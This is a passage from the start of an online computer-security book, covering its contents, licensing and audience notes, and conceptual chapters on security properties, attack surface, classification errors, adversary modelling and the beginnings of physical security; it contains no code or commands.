Security Concepts
travis+security@subspacefield.org
Abstract
This is an online book about computer, network, technical, physical,
information and cryptographic security. It is a labor of love, incomplete
until the day I am finished.
Contents
1 Metadata
1.1 Copyright and Distribution Control
1.2 Goals
1.3 Audience
1.4 About This Work
1.5 How to Read the Online Version
1.6 About Writing This
1.7 Tools Used To Create This Book
2 Security Properties
2.1 Information Security is a PAIN
2.2 Parkerian Hexad
2.3 Pentagon of Trust
2.4 Security Equivalency
2.5 Other Questions
3 Security Concepts
3.1 Attack Surface
3.2 The Classification Problem
3.2.1 Classification Errors
3.2.2 The Base-Rate Fallacy
3.2.3 Test Efficiency
3.2.4 Incompletely-Defined Sets
3.2.5 The Guessing Hazard
3.3 Security Layers
3.4 Privilege Levels
3.5 Attack Characteristics
3.6 What is a Vulnerability?
3.7 Accuracy Limitations in Making Decisions That Impact Security
4 Adversaries and Threats
4.1 Common Psychological Errors
4.2 Cost-Benefit
4.3 Risk Tolerance
4.4 Capabilities
4.5 Sophistication Distribution
4.6 Goals
5 Physical Security
5.1 No Physical Security Means No Security
5.2 Data Remanence
5.2.1 Magnetic Storage Media (Disks)
5.2.2 Semiconductor Storage (RAM)
6 Distributed Systems
6.1 Cryptography is the Sine Qua Non of Secure Distributed Systems
6.2 Hello, My Name is 192.168.1.1
6.3 Source Tapping; The First Hop and Last Mile
6.4 Security Zones
6.5 Security Equivalent Things Go Together
6.6 Outsider Threats vs. Insider Threats
6.7 A Proposed Perimeter Defense
6.8 Man In The Middle
6.8.1 DNS Issues
6.8.2 IP Routing
6.8.3 Link-layer Issues
6.8.4 Physical Layer
6.8.5 Periodic Rechecking
6.8.6 Out-of-Band Comparison
6.8.7 Parallel Paths
6.8.8 Formatting
7 Identification and Authentication
7.1 Identity
7.2 What Authority?
7.3 Authentication Factors
7.4 Authentication Issues: When, What
7.5 The Identity Continuum
7.6 Problems Remaining Anonymous
7.7 Problems with Identifying People
7.8 Remote Attestation
8 Access Control
8.1 Privilege Escalation
8.2 Physical Access Control
8.3 Operating System Access Control: DAC, MAC, RBAC
9 Secure System Administration
9.1 Change Management
9.2 Self-Healing Systems
9.3 Heterogeneous vs. Homogeneous Defenses
10 Logging
10.1 Synchronized Time
10.2 Syslog
11 Reports
11.1 Change Reporting
11.2 Artificial Ignorance
11.3 Dead Man's Switch
12 Abuse Detection
12.1 Misuse Detection vs. Anomaly Detection
12.2 Honey Traps
12.3 Tripwires and Booby Traps
12.4 Anti-Malware
12.5 Anti-Spam
12.6 Detecting Automated Peers
12.6.1 CAPTCHA
12.6.2 Bot Traps
12.6.3 Velocity Checks
12.6.4 Typing Mistakes
12.7 Host-Based Intrusion Detection
12.8 Intrusion Detection Principles
12.9 Intrusion Information Collection
12.10 Intrusion Alerting
12.10.1 Possible Intrusion Alerting Solutions
13 Abuse Response
13.1 How to Respond to Abuse
13.2 The Silent Treatment
13.3 Random Response
13.4 Faux Positives
13.5 The Simulation Defense
13.5.1 Fishbowls
13.6 Hack-Back
13.6.1 Reverse-Hack
13.6.2 Mirror Defense
13.6.3 Counterhack
13.7 Identification Issues
13.8 Proportional Response
14 Forensics
14.1 Forensic Limitations
14.2 Ephemeral Data
14.3 Remnant Data
14.4 Hidden Data
14.5 Metadata
14.6 Forensic Inference
15 Network Security
15.1 The Current State of Things
15.2 Traffic Identification: RPC, Dynamic Ports, User-Specified Ports and Encapsulation
15.2.1 RPC
15.2.2 Dynamic Port Numbers
15.2.3 Encapsulation
15.2.4 Possible Solutions
15.3 Advanced Network Security Technologies
16 Web Security
16.1 Direct Browser Attacks
16.2 Indirect Browser Attacks
16.3 SSL Certificates Made Redundant
17 Application Security
17.1 Security is a Subset of Correctness
17.2 Malware vs. Data-Directed Attacks
17.3 Reverse Engineering
17.4 Application Exploitation
17.5 Application Exploitation Defenses
17.5.1 Stack-Smashing Protection
17.5.2 Address-Space Layout Randomization (ASLR)
17.5.3 Write XOR Execute
17.6 Software Complexity
17.6.1 Complexity of Network Protocols
17.6.2 Polymorphism and Complexity
17.7 Failure Modes
17.8 Fault Tolerance
17.9 Implications of Incorrectness
18 Trust
18.1 Trust and Trustworthiness
18.2 Code Provenance: Signed Programs and Trusted Authors
19 Cryptology
19.1 Limits of Cryptography
19.1.1 The Last Foot of the Communication
19.1.2 Limitations Regarding Endpoint Security
19.1.3 In Practice
19.2 How Strong Should My Cryptography Be?
19.2.1 Key Lengths
19.3 Cryptographic Algorithms
19.3.1 Combiners
19.3.2 Speed of Algorithms and the Hybrid Encryption Scheme
19.3.3 HMAC: The Symmetric Digital Signature
19.4 Cryptographic Algorithm Enhancements
19.4.1 Hashing Stored Authentication Data
19.4.2 Offline Dictionary Attacks and Iterated Hashes
19.4.3 Salts vs. Offline Dictionary Attacks and Rainbow Tables
19.4.4 Offline Dictionary Attacks with Partial Confidentiality
19.5 Cryptographic Combinations
19.5.1 The Sign then Encrypt Problem
19.5.2 Key Derivation Functions
19.6 Cryptographic Protocols
19.6.1 DoS and Anti-Clogging Tokens
19.6.2 The Problem with Authenticating within an Encrypted Channel
19.6.3 How to Protect the Integrity of a Session
19.6.4 Freshness and Replay Attacks
19.6.5 Authentication
19.6.6 Key Exchange and Hybrid Encryption Schemes
19.7 Encrypted Storage
19.7.1 Key Escrow for Encrypted Storage
19.7.2 Evolution of Cryptographic Storage Technologies
19.7.3 Filesystem Crypto Layers
19.7.4 File Systems with Optional Encryption
19.7.5 Block Device Crypto
19.7.6 The Cryptographically-Strong Pseudo-random Quick Fill
19.7.7 Backups
19.8 Key Management
19.8.1 Key Exchange and the Bootstrapping Problem
19.8.2 One Key, One Purpose
19.8.3 Time Compartmentalization
19.8.4 Key Indirection
19.8.5 Secret Sharing
20 Randomness and Unpredictability
20.1 What is an Ideal Random Number Generator?
20.2 Definitions of Unpredictability
20.3 Definitions of Randomness
20.4 Why Entropy and Unpredictability Are Not The Same
20.5 Unpredictability is the Sine Qua Non of Cryptography
20.6 Predictability is Provable, Unpredictability is Not
20.7 Randomly-Generated Samples Are No Different Than Any Other Sample
20.8 Testing For Predictability
20.9 Ways to Fail
20.10 Humans Are Too Predictable
20.11 Sources of Unpredictability
20.12 The Laws of Unpredictability
21 Lateral Thinking
21.1 Traffic Analysis
21.2 Side Channels
21.2.1 Physical Information-Gathering Attacks and Defenses
21.2.2 Signal Injection Attacks and Defenses
21.2.3 System-Local Side-Channel Attacks
21.2.4 Timing Side-Channels
22 Information and Intelligence
22.1 Controlling Information Flow
22.2 Labeling and Regulations
22.3 Knowledge is Power
22.4 Secrecy is Power
22.5 Never Confirm Guesses
22.6 What You Don't Know Can Hurt You
22.7 How Secrecy is Lost
22.8 Costs of Disclosure
22.9 Dissemination
22.10 Information, Misinformation, Disinformation
23 Conflict and Combat
23.1 Indicators and Warnings
23.2 Attacker's Advantage in Network Warfare
23.3 Defender's Advantage in Network Warfare
23.4 OODA Loops
24 Security Principles
24.1 The Principle of Least Privilege
24.2 The Principle of Agility
24.3 The Principle of Minimal Assumptions
24.4 The Principle of Fail-Secure Design
24.5 The Principle of Unique Identifiers
24.6 The Principles of Simplicity
24.7 The Principle of Defense in Depth
24.8 The Principle of Uniform Fronts
24.9 The Principle of Split Control
24.10 The Principle of Minimal Changes
24.11 The Principle of Centralized Management
24.12 The Principle of Least Surprise
24.13 The Principle of Removing Excuses
24.14 The Principle of Retaining Control
24.15 Availability Principles
25 Common Arguments
25.1 Disclosure: Full, Partial, or None?
25.1.1 Arguments for Full Disclosure
25.1.2 Arguments Against Full Disclosure - Vendor
25.1.3 Arguments Against Full Disclosure - Vendor's Employees
25.1.4 Arguments Against Full Disclosure - End User
25.2 Theorists vs. Pragmatists, Absolute vs. Effective Security
25.3 Quantification and Metrics vs. Intuition
25.4 Security Through Obscurity
25.5 Security of Open Source vs. Closed Source
25.6 Prevention vs. Detection
25.7 Prevention vs. Monitoring
25.8 Early vs. Late Adopters
26 Editorials, Predictions, Polemics, and Personal Opinions
26.1 Security is for Polymaths
26.2 Computers are Transcending our Limitations
26.3 Reusable Authentication Data Considered Harmful
26.4 Password Length Limits Considered Harmful
26.5 Everything Will Be Encrypted Soon
26.6 Error Propagation Characteristics Usually Don't Matter
26.7 Keep it Legal, Stupid
26.8 Should My Employees Attend "Hacker" Conferences?
26.9 I'm a Young Hacker, Should I Sell Out and Do Security for a Corporation?
26.10 Anonymity is not a Crime
26.10.1 Example: Sears Makes Customer Purchase Information Available Online, Provides Spyware to Customers
26.11 Monitoring Your Employees
26.12 Trust People in Spite of Counterexamples
26.13 Do What I Mean vs. Do What I Say
27 Resources
27.1 My Other Stuff
27.2 Conferences
27.3 Books
27.3.1 Publishers
27.3.2 Titles
27.4 Periodicals
27.5 Blogs
27.6 Mailing Lists
28 Credits
1 Metadata
1.1 Copyright and Distribution Control
Kindly link a person to it instead of redistributing it, so that people
may always receive the latest version. However, even an outdated copy
is better than none. The PDF version is preferred and more likely
to render properly (especially graphics and special mathematical characters),
but the HTML version is simply too convenient to not have it available.
The latest version is always here:
- PDF
- http://www.subspacefield.org/security/security_concepts.pdf
- HTML
- http://www.subspacefield.org/security/security_concepts.html
This is a copyrighted work, with some rights reserved. This work is
licensed under the Creative Commons Attribution-Noncommercial-No
Derivative Works 3.0 United States License (http://creativecommons.org/licenses/by-nc-nd/3.0/us/).
This means you may make redistribute it, that you must attribute me
properly (without suggesting I endorse your work), so long as you
do not use it for commerical purposes. For attribution, please include
a prominent link back to this original work and some text describing
the changes. I am comfortable with certain derivative works, such
as translation into other languages, but not sure about others, so
have yet not explicitly granted permission for all derivative uses.
If you have any questions, please email me and I'll be happy to discuss
it with you.
I wrote this paper to try and examine the typical problems in computer
security and related areas, and attempt to extract from them principles
for defending systems. To this end I attempt to synthesize various
fields of knowledge, including computer security, network security,
cryptology, and intelligence. I also attempt to extract the principles
and implicit assumptions behind cryptography and the protection of
classified information, as obtained through reverse-engineering (that
is, informed speculation based on existing regulations and stuff I
read in books), where they are relevant to technological security.
1.3 Audience
When I picture a perfect reader, I always picture a monster of courage
and curiosity, also something supple, cunning, cautious, a born adventurer
and discoverer.
- Friedreich Nietzsche
This is not intended to be an introductory text, although a beginner
could gain something from it. The reason behind this is that beginners
think in terms of tactics, rather than strategy, and of details rather
than generalities. There are many fine books on computer and network
security tactics (and many more not-so-fine books), and tactics change
quickly, and being unpaid for this work, I am a lazy author. The reason
why even a beginner may gain from it is that I have attempted to extract
abstract concepts and strategies which are not necessarily tied to
computer security. And I have attempted to illustrate the points with
interesting and entertaining examples and would love to have more,
so if you can think of an example for one of my points, please send
it to me!
I'm writing this for you, noble reader, so your comments are very
welcome; you will be helping me make this better for every future
reader. If you send a contribution or comment, you'll save me a lot
of work if you tell me whether you wish to be mentioned in the credits
(see 28) or not; I want to respect the privacy of
anonymous contributors. If you're concerned that would be presumptuous,
don't be; I consider it considerate of you to save me an email exchange.
Security bloggers will find plenty of fodder by looking for new URLs
added to this page, and I encourage you to do it, since I simply don't
have time to comment on everything I link to. If you link to this
paper from your blog entry, all the better.
1.4 About This Work
I have started this book with some terminology as a way to frame the
discussion. Then I get into the details of the technology. Since this
is adequately explained in other works, these sections are somewhat
lean and may merely be a list of links. Then I get into my primary
contribution, which is the fundamental principles of security which
I have extracted from the technological details. Afterwards, I summarize
some common arguments that one sees among security people, and I finish
up with some of my personal observations and opinions.
1.5 How to Read the Online Version
Since this document is constantly being revised, I suggest that you
start with the table of contents and click on the subject headings
so that you can see which ones you have read already. If I add a section,
it will show up as unread. By the time it has expired from your browser's
history, it is probably time to re-read it anyway, since the contents
have probably been updated.
See the end of this page for the date it was generated (which is also
the last update time). I currently update this about once every two
weeks.
1.6 About Writing This
Part of the challenge with writing about this topic is that we are
always learning and it never seems to settle down, nor does one ever
seem to get a sense of completion. I consider it more permanent and
organized than a blog, more up-to-date than a book, and more comprehensive
and self-contained than most web pages. I know it's uneven; in some
areas it's just a heading with a paragraph, or a few links, in other
places it can be as smoothly written as a book. I thought about breaking
it up into multiple documents, so I could release each with much more
fanfare, but that's just not the way I write, and it makes it difficult
to do as much cross-linking as I'd like.
This is to my knowledge the first attempt to publish a computer security
book on the web before printing it, so I have no idea if it will even
be possible to print it commercially. That's okay; I'm not writing
for money. I'd like for the Internet to be the public library of the
21st century, and this is my first significant donation
to the collection. I am reminded of the advice of a staffer in the
computer science department, who said, "do what you love, and
the money will take care of itself".
That having been said, if you wanted towards the effort, you can help
me defray the costs of maintaining a server and such by visiting our
donation page (http://www.subspacefield.org/donate.html). If
you would like to donate but cannot, you may wait until such a time
as you can afford to, and then give something away (i.e. pay it forward).
1.7 Tools Used To Create This Book
I use lyx (http://www.lyx.org/), but I'm still a bit of a novice.
I have a love/hate relationship with it and the underlying typesetting
language LATEX(http://en.wikipedia.org/wiki/LaTeX).
2 Security Properties
What do we mean by secure? When I say secure, I mean that an
adversary can't make the system do something that its owner (or designer,
or administrator, or even user) did not intend. Often this involves
a violation of a general security property. Some security properties
include:
- confidentiality
- refers to whether the information in question
is disclosed or remains private.
- integrity
- refers to whether the systems (or data) remain uncorrupted.
The opposite of this is malleability, where it is possible
to change data without detection, and believe it or not, sometimes
this is a desirable security property.
- availability
- is whether the system is available when you need
it or not.
- consistency
- is whether the system behaves the same each time
you use it.
- auditabilty
- is whether the system keeps good records of what
has happened so it can be investigated later. Direct-record electronic
voting machines (with no paper trail) are unauditable.
- control
- is whether the system obeys only the authorized users
or not.
- authentication
- is whether the system can properly identify users.
Sometimes, it is desirable that the system cannot do so, in which
case it is anonymous or pseudonymous.
- non-repudiation
- is a relatively obscure term meaning that if
you take an action, you won't be able to deny it later. Sometimes,
you want the opposite, in which case you want repudiability
("plausible deniability").
Please forgive the slight difference in the way they are named; while
English is partly to blame, these properties are not entirely parallel.
For example, confidentiality refers to information (or inferences
drawn on such) just as program refers to an executable stored on the
disk, whereas control implies an active system just as process refers
to a running program (as they say, "a process is a program in
motion"). Also, you can compromise my data confidentiality with
a completely passive attack such as reading my backup tapes, whereas
controlling my system is inherently detectable since it involves interacting
with it in some way.
2.1 Information Security is a PAIN
You can remember the security properties of information as PAIN; Privacy,
Authenticity, Integrity, Non-Repudiation.
2.2 Parkerian Hexad
There is something similar known as the "Parkerian Hexad", defined
by Donn B. Parker, which is six fundamental, atomic, non-overlapping
attributes of information that are protected by information security
measures:
- confidentiality
- possession
- integrity
- authenticity
- availability
- utility
2.3 Pentagon of Trust
- Admissibility (is the remote node trustworthy?)
- Authentication (who are you?)
- Authorization (what are you allowed to do?)
- Availability (is the data accessible?)
- Authenticity (is the data intact?)
2.4 Security Equivalency
I consider two objects to be security equivalent if they are
identical with respect to the security properties under discussion;
for precision, I may refer to confidentiality-equivalent pieces
of information if the sets of parties to which they may be disclosed
(without violating security) are exactly the same (and conversely,
so are the sets of parties to which they may not be disclosed). In
this case, I'm discussing objects which, if treated improperly, could
lead to a compromise of the security goal of confidentiality.
Or I could say that two cryptosystems are confidentiality-equivalent,
in which case the objects help achieve the security goal. To be perverse,
these last two examples could be combined; if the information in the
first example was actually the keys for the cryptosystem in the second
example, then disclosure of the first could impact the confidentiality
of the keys and thus the confidentiality of anything handled by the
cryptosystems. Alternately, I could refer to access-control equivalence
between two firewall implementations; in this case, I am discussing
objects which implement a security mechanism which helps us
achieve the security goal, such as confidentiality of something.
2.5 Other Questions
- Secure to whom? A web site may be secure (to its owners) against unauthorized
control, but may employ no encryption when collecting information
from customers.
- Secure from whom? A site may be secure against outsiders, but not
insiders.
3 Security Concepts
There is no security on this earth, there is only opportunity.
- General Douglas MacArthur (1880-1964)
These are important concepts which appear to apply across multiple
security domains.
3.1 Attack Surface
Gnothi Seauton ("Know Thyself")
- ancient Greek aphorism (http://en.wikipedia.org/wiki/Know_thyself)
When discussing security, it's often useful to analyze the part which
may interact with a particular adversary (or set of adversaries).
For example, let's assume you are only worried about remote adversaries.
If your system or network is only connected to outside world via the
Internet, then the attack surface is the parts of your system that
interact with things on the Internet, or the parts of your system
which accept input from the Internet. A firewall, then, limits the
attack surface to a smaller portion of your systems by filtering some
of your network traffic. Often, the firewall blocks all incoming connections.
Sometimes the attack surface is pervasive. For example, if you have
a network-enabled embedded device like a web cam on your network that
has a vulnerability in its networking stack, then anything which can
send it packets may be able to exploit it. Since you probably can't
fix the software in it, you must then use a firewall to attempt to
limit what can trigger the bug. Similarly, there was a bug in sendmail
that could be exploited by sending a carefully-crafted email through
a vulnerable server. The interesting bit here is that it might be
an internal server that wasn't exposed to the Internet; the exploit
was data-directed and so could be passed through your infrastructure
until it hit a vulnerable implementation. That's why I consistently
use one implementation (not sendmail) throughout my network now.
If plugging a USB drive into your system causes it to automatically
run things like a standard Microsoft Windows XP install, then any
plugged-in device is part of the attack surface (http://it.slashdot.org/article.pl?sid=08/01/13/1533243).
But even if it does not, then by plugging a USB device in you could
potentially overflow the code which handles the USB or the driver
for the particular device which is loaded (http://www.eweek.com/article2/0,1895,1840141,00.asp,
http://www.schneier.com/blog/archives/2006/06/hacking_compute.html);
thus, the USB networking code and all drivers are part of the attack
surface if you can control what is plugged into the system. Moreover,
a recent vulnerability (http://it.slashdot.org/it/08/01/14/1319256.shtml)
illustrates that when you have something which inspects network traffic,
such as uPNP devices or port knocking daemons, then their code forms
part of the attack surface.
Sometimes you will hear people talk about the "anonymous attack
surface"; this is the attack surface available to everyone (on the
Internet). Since this number of people is so large, and you usually
can't identify them or punish them, you want to be really sure that
the anonymous attack surface is limited and doesn't have any so-called
"pre-auth" vulnerabilities, because those can be exploited prior
to identification and authentication.
3.2 The Classification Problem
Many times in security you wish to distinguish between classes of
data. This occurs in firewalls, where you want to allow certain traffic
but not all, and in intrusion detection where you want to allow benign
traffic but not allow malicious traffic, and in operating system security,
we wish to allow the user to run their programs but not malware. In
doing so, we run into a number of limitations in various domains that
deserve mention together.
3.2.1 Classification Errors
False Positives vs. False Negatives, also called Type I and Type II
errors. Discuss equal error rate (EER) and its use in biometrics.
Sometimes in medicine they will do a cheap test with a high error
rate biased one direction (often false positives), and a more expensive
test with a lower error rate, usually biased in the other direction.
3.2.2 The Base-Rate Fallacy
In The Base Rate Fallacy and its Implications for Intrusion
Detection (http://www.raid-symposium.org/raid99/PAPERS/Axelsson.pdf),
the author essentially points out that there's a lot of benign traffic
for every attack, and so even a small chance of a false positive will
quickly overwhelm any true positives. Put another way, if one out
of every 10,001 connections is malicious, and the test has a 1% false
positive error rate, then for every 1 real malicious connection there
10,000 benign connections, and hence 100 false positives.
3.2.3 Test Efficiency
In other cases, you are perfectly capable of performing an accurate
test, but not on all the traffic. You may want to apply a cheap test
with some errors on one side before applying a second, more expensive
test on the side with errors to weed them out. This is done in BSD
Unix with packet capturing via tcpdump, which uploads a coarse filter
into the kernel, and then applies a more expensive but finer-grained
test in userland which only operates on the packets which pass the
first test.
3.2.4 Incompletely-Defined Sets
As far as the laws of mathematics refer to reality, they are not certain;
and as far as they are certain, they do not refer to reality.
- Albert Einstein
Stop for a moment and think about the difficulty of trying to list
all the undesirable things that your computer shouldn't do. If you
find yourself finished, then ask yourself; did you include that it
shouldn't attack other computers? Did you include that it shouldn't
transfer $1000 to a mafia-run web site when you really intended to
transfer $100 to your mother? Did you include that it shouldn't send
spam to your address book? The list goes on and on.
Thus, if we had a complete list of everything that was bad, we'd block
it and never have to worry about it again. However, often we either
don't know, or the set is infinite. Similarly, we may not be able
to obtain a complete list of everything that is good; imagine trying
to specify in advance all the network packets that should be allowed
into your enterprise!
3.2.5 The Guessing Hazard
So often we can't enumerate all the things we would want to do, nor
all the things that we would not want to do. Because of this, intrusion
detection systems (see 12) often simply guess;
they try to detect attacks unknown to them by looking for features
that are likely to be present in malware but not in normal traffic.
At the current moment, you can find out if your traffic is passing
through an IPS by trying to send a long string of A's in a session.
This isn't malicious by itself, but is a common letter with which
people pad exploits (see 17.4). In
this case, it's a great example of a false positive, or collateral
damage, generated through guilt-by-association; there's nothing
inherently suspicious about a string of A's, it's just that
exploit writers use them a lot, and IPS vendors decided that made
them suspicious. I'm not a big fan of these because I feel that it
breaks functionality that doesn't threaten the system, and that it
could be used as evidence of malfeasance against someone by someone
who doesn't really understand the technology. I'm already irritated
by the false-positives or excessive warnings about security tools
from anti-virus software; it seems to alert to "potentially-unwanted
programs" an absurd amount of the time; most novices don't understand
that the anti-virus software reads the disk even though I'm not running
the programs, and that you have nothing to fear if you don't run the
programs. I fear that one day my Internet Service Provider will start
filtering them out of my email or network streams, but fortunately
they just don't care that much.
3.3 Security Layers
I like to think of security as a hierarchy. At the base, you have
physical security. On top of that is OS security, and on top of that
is application security, and on top of that, network security. You
may have an unbeatable firewall, but if your OS doesn't require a
password and your adversary has physical access, you lose. So each
layer of the pyramid can not be more secure (in an absolute sense)
as the layer below it. Ideally, each layer should be available to
fewer adversaries than the layer above it, so that one has a sort
of balance or risk equivalency.
- network security
- application/database security
- OS security
- physical security
In operating system security, we distinguish between users
of the system, and perhaps the roles they are fulfilling, and only
concern ourselves with activities within that computer. It is assumed
that the adversary has some access, but less than full privileges
on the system. In network security, we concern ourselves with
nodes in the networks (usually individual computers), and do not distinguish
between users of each system. In some sense, we are now assigning
rights to computers and not people. This is often justified since
it is usually easier to leverage one user's access to gain another's
within the same system than to gain access to another system (but
this is not a truism).
3.4 Privilege Levels
Here's a taxonomy of some commonly-useful privilege levels.
- Anonymous, remote systems
- Authenticated remote systems
- Local unprivileged user (UID > 0)
- Administrator (UID 0)
- Kernel (privileged mode, ring 0)
- Hardware (TPM, ring -1, hypervisors, trojaned hardware)
Actual systems may vary, levels may not be strictly hierarchical,
etc. Basically the higher the level you get, the harder you are to
detect. The gateways between the levels are access control devices,
analogous with firewalls.
3.5 Attack Characteristics
All attacks are not created equal. They may sometimes be grouped together
in various ways, though, and so that leads us to ask whether there
are any dimensions, or characteristics, by which we may classify known
attacks.
- access required
- to execute the attack varies; some attacks require
a system account, while others can be exploited by anyone on the Internet.
- detectability
- usually means that the attack involves a non-standard
interaction with us, and therefore involves something which we could
(in theory) look for and recognize. Passive attacks, typically eavesdropping,
are very difficult or impossible to detect.
- recoverability
- refers to whether we may, after detecting or suspecting
an attack, restore the state of the system to a secure one. Usually
once an adversary has complete control of a system, we cannot return
it to a secure state without some unusual actions, because they may
have tampered with any tools we may be using to inspect or fix the
system.
- preventability
- refers to whether there exists a defense which
allows us to prevent it, or whether we must be content with detecting
it. We can sometimes prevent attacks we cannot detect; for example,
we can prevent someone from reading our wireless transmissions by
encrypting them properly, but we can't usually detect whether or not
any third party is receiving them.
- scalability
- means the same attack will probably work against
many systems, and does not require human effort to develop or customize
for each system.
- offline exploitability
- means that the attack may be conducted
once but exploited several times, as when you steal a cryptographic
key.
- sophistication
- refers to the property of requiring a great deal
of skill, versus an unsophisticated attack like guessing a password
to a known system account.
Much of this list is thanks to the Everest voting machine report (http://www.sos.state.oh.us/sos/info/EVEREST/14-AcademicFinalEVERESTReport.pdf).
Putting a key in a smart card or TPM or HSM prevents it from being
copied and reused later, offline, but it doesn't prevent it from being
abused by the adversary while he has control of its inputs. For example,
a trojan can submit bogus documents to a smart card to have them signed,
and the user has no way of knowing. Similarly, sometimes techniques
like putting passphrases on SSH keys can prevent them from being stolen
right away, requiring a second visit (or at least an exfiltration
at a later date). However, each interaction with the system by the
adversary risks detection, so he wants to do so once only, instead
of multiple times.
For example, your adversary could pilfer your SSL cert, and then use
it to create a phishing site elsewhere. This is a single loss of confidentiality,
then an authentication attack (forgery) not against you, but against
your customers (third parties). Or he could pilfer your GPG key, then
use it to forge messages from you (a similar detectable attack) or
read your email (passive attack, undetectable). Or he might break
in, wanting to copy your SSH key, find that it's encrypted with a
passphrase, install a key logger, and come back later to retrieve
the passphrase (two active attacks). Alternately, the key logger could
send the data out automatically (exfiltration).
3.6 What is a Vulnerability?
Now that you know what a security property is, what constitutes (or
should constitute) a vulnerability? On the arguable end of the scale
we have "loss of availability", or susceptibility to denial
of service (DoS). On the inarguable end of the scale, we have "loss
of control", which usually arbitrary code execution, which often
means that the adversary can do whatever he wants with the system,
and therefore can violate any other security property.
3.7 Accuracy Limitations in Making Decisions That Impact Security
On two occasions I have been asked, "Pray, Mr. Babbage, if you
put into the machine wrong figures, will the right answers come out?"
In one case a member of the Upper, and in the other a member of the
Lower, House put this question. I am not able rightly to apprehend
the kind of confusion of ideas that could provoke such a question.
- Charles Babbage
This is sometimes called the GIGO rule (Garbage In, Garbage Out).
Stated this way, this seems self-evident. However, you should realize
that this applies to systems as well as programs. For example, if
your system depends on DNS to locate a host, then the correctness
of your system's operation depends on DNS. Whether or not this is
exploitable (beyond a simple denial of service) depends a great deal
on the details of the procedures. This is a parallel to the question
of whether it is possible to exploit a program via an unsantitized
input.
You can never be more accurate than the data you used for your input.
Try to be neither precisely inaccurate, nor imprecisely accurate.
Learn to use footnotes.
4 Adversaries and Threats
If you know the enemy and know yourself, you need not fear the result
of a hundred battles.
If you know yourself but not the enemy, for every victory gained you
will also suffer a defeat.
If you know neither the enemy nor yourself, you will succumb in every
battle.
- Sun Tzu, The Art of War (http://en.wikipedia.org/wiki/The_Art_of_War)
After deciding what you need to protect (your assets), you
need to know about the threats you wish to protect it against,
or the adversaries (sometimes called threat agents)
which may threaten it. Generally intelligence units have threat
shops, where they monitor and keep track of the people who may threaten
their operations. This is natural, since it is easier to get an idea
of who will try and do something than how some unspecified person
may try to do it, and can help by hardening systems in enemy territory
more than those in safer areas, leading to more efficient use of resources.
In technology, people tend to focus on how rather than who, which
seems to work better when anyone can potentially attack any system
(like with publicly-facing systems on the Internet) and when protection
mechanisms have low or no incremental cost (like with free and open-source
software). Modeling these is called threat modeling (http://en.wikipedia.org/wiki/Threat_model).
In attacker-centric threat modeling, the implicit assumptions are
that you have a limited budget and the number of threats is so large
that you cannot defend against all of them. So you now need to decide
where to allocate your resources. Part of this involves trying to
figure out who your adversaries are and what their capabilities and
intentions are, and thus how much to worry about particular domains
of knowledge or technology. You don't have to know their name, location
and social security number; it can be as simple as "some high
school student on the Internet somewhere who doesn't like us", "a
disgruntled employee" (as opposed to a gruntled employee), or "some
sexually frustrated script-kiddie on IRC who doesn't like the fact
that he is a jerk who enjoys abusing people and therefore his only
friends are other dysfunctional jerks like him". People in charge
of doing attacker-centric threat modeling must understand their
adversaries and be willing to take chances by allocating resources
against an adversary which hasn't actually attacked them yet, or else
they will always be defending against yesterday's adversary, and get
caught flat-footed by a new one.
4.1 Common Psychological Errors
The excellent but poorly titled1 book Searching for Happiness tells us that we make two common
kinds of errors when reasoning about other humans:
- Overly different; if you looked at grapes all day, you'd know a hundred
different kinds, and naturally think them very different. But they
all squish when you step on them, they are all fruits and frankly,
not terribly different at all. So too we are conditioned to see people
as different because the things that matter most to us, like finding
an appropriate mate or trusting people, cannot be discerned with questions
like "do you like breathing?". An interesting experiment showed
that a description of how they felt by people who had gone through
a process is more accurate in predicting how a person will feel after
the process than a description of the process itself. Put another
way, people assume that the experience of others is too dependent
on the minor differences between humans that we mentally exaggerate.
- Overly similar; people assume that others are motivated by the same
things they are motivated by; we project onto them a reflection of
our self. If a financier or accountant has ever climbed mount Everest,
I am not aware of it. Surely it is a cost center, yes?
4.2 Cost-Benefit
Often, the lower layers of the security hierarchy cost more to build
out than the higher levels. Physical security requires guards, locks,
iron bars, shatterproof windows, shielding, and various other things
which, being physical, cost real money. On the other hand, network
security may only need a free software firewall. However, what an
adversary could cost you during a physical attack (e.g. a burglar
looting your home) may be greater than an adversary could cost you
by defacing your web site.
4.3 Risk Tolerance
We may assume that the distribution of risk tolerance among adversaries
is monotonically decreasing; that is, the number of adversaries who
are willing to try a low-risk attack is greater than the number of
adversaries who are willing to attempt a high-risk attack to get the
same result. Beware of risk evaluation though; while a hacker may
be taking a great risk to gain access to your home, local law enforcement
with a valid warrant is not going to be risking as much.
So, if you are concerned about a whole spectrum of adversaries, known
and unknown, you may wish to have greater network security than physical
security, simply because there are going to be more remote attacks.
4.4 Capabilities
You only have to worry about things to the extent they may lie within
the capabilities of your adversaries. It is rare that adversaries
use outside help when it comes to critical intelligence; it could,
for all they know, be disinformation, or the outsider could be an
agent-provocateur.
4.5 Sophistication Distribution
If they were capable, honest, and hard-working, they wouldn't need
to steal.
Along similar lines, one can assume a monotonically decreasing number
of adversaries with a certain level of sophistication. My rule of
thumb is that for every person who knows how to perform a technique,
there are x people who know about it, where x
is a small number, perhaps 3 to 10. The same rule applies to people
with the ability to write an exploit versus those able to download
and use it (the so-called script kiddies). Once an exploit
is coded into a worm, the chance of a compromised host having been
compromised by the worm (instead of a human who targets it specifically)
approaches 100%. Discuss Bayesian inference.
We've all met or know about people who would like nothing more than
to break things, just for the heck of it; schoolyard bullies who feel
hurt and want to hurt others, or their overgrown sadist kin. Vandals
who merely want to write their name on your storefront. A street thug
who will steal a cell phone just to throw it through a window. I'm
sure the sort of person reading this isn't like that, but unfortunately
some people are. What exactly are your adversary's goals? Are they
to maximize ROI (Return On Investment) for themselves, or are they
out to maximize pain (tax your resources) for you? Are they monetarily
or ideologically motivated? What do they consider investment? What
do they consider a reward? Put another way, you can't just assign
a dollar value on assets, you must consider their value to the adversary.
5 Physical Security
When people think of physical security, these often are the limit
on the strength of access control devices; I recall a story of a cat
burglar who used a chainsaw to cut through victim's walls, bypassing
any access control devices. I remember reading someone saying that
a deep space probe is the ultimate in physical security.
5.1 No Physical Security Means No Security
A couple of limitations come up without physical security for a system.
For confidentiality, all of the sensitive data needs to be encrypted.
But even if you encrypt the data, an adversary with physical access
could trojan the OS and capture the data (this is a control attack
now, not just confidentiality breach; go this far and you've protected
against overt seizure, theft, improper disposal and such). So you'll
need to you protect the confidentiality and integrity of the OS, he
trojans the kernel. If you protect the kernel, he trojans the boot
loader. If you protect the boot loader (say by putting on a removable
